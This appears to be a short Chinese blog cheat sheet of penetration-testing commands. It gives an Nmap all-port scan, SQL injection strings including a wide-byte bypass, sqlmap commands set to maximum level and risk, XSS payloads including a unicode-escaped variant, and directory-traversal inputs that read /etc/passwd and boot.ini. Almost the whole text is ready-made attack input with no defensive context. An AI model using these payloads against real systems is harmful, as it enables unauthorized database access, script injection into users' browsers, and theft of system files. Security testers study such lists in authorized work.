【工具】渗透常用指令
Nmap
- 使用工具Nmap扫描服务器ip,配置选择“Intense scan, all TCP ports”
- 扫描目标开启的端口:nmap -sV -p- <目标IP地址>
SQL
'or'1'='1'or'1'='2'''"'--'or1=1--'or'2'>'1%20AND%201=1運'(转义'==\'宽字节注入%df'==%df%5c%27==運')1' order by 1 %23sqlmap.py -u http://xxxx -p 参数--dbssqlmap.py -r “D:\..\post.txt” -p 参数--dbssqlmap.py -l "D:\..\post.txt" --batch --smart(--level=5 --risk=3)- 伪静态页面在注入参数后加代表注入位置:http://xxxx/2.html
txt文档也可用*. 如username=admin*&password=admin888 //注入username字段
XSS
<script>alert(1)</script>"><script>alert(1)</script>"</script><script>alert(1)</script><img src=a onerror=alert(1)>"><img src=x onerror=confirm(1)><"<script>prompt(1)</script><a href=aaaa.com>1111</a>\u003cscript\u003ealert\u00281\u0029\u003c\u002fscript\u003e\u003ca href=aaa.com\u003e111\u003c\u002fa\u003e
任意文件下载
fileName=../../../../../../../../../etc/passwd&path=/etc/passwdfileName=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswdfileName可以是其他参数. tableName. data等,Windows: fileName=c:\boot.ini&path=c:\boot.ini
【工具】渗透常用指令
https://eudonomia.eu.org/posts/b41c7870.html